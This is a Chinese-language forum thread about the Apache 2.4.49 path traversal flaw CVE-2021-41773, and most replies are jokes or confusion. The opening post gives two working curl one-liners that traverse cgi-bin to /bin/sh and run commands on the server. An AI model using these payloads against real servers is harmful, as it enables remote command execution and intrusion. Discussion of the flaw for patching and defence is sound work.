新漏洞

spr1ng · 发表于 2021-10-6 17:03:57

CVE-2021-41773升级为无码版命令执行[惊恐]

exp:
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

curl --data "A=|id>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

imtoken · 发表于 2021-10-6 18:12:48

此问题仅影响 Apache 2.4.49 而不是早期版本。

spr1ng · 发表于 2021-10-6 18:10:23

acpp 发表于 2021-10-6 17:06
v2.4.49 就这版本的目录穿越吧

最近有个海康威视蛇摄像头的漏洞喜欢**的有福了

galesaur · 发表于 2021-10-6 17:35:24

以为甲鱼文呢

huang1dede · 发表于 2021-10-6 17:25:20

说人话

sunsun01 · 发表于 2021-10-6 17:22:23

看不懂就不参与了

tomcb · 发表于 2021-10-6 17:21:39

Mr.Qin 发表于 2021-10-6 17:04
不觉明历

https://www.secrss.com/articles/34890

我用NGINX

LikeOracle · 发表于 2021-10-6 17:19:55

我还以为甲骨文又出啥漏洞了

nmdwsm · 发表于 2021-10-6 17:16:26

看不懂
zsbd

笑花落半世琉璃 · 发表于 2021-10-6 17:11:07

看不懂说点听的懂得

		自动登录	找回密码
密码			注册

[疑问] 新漏洞

浏览过的版块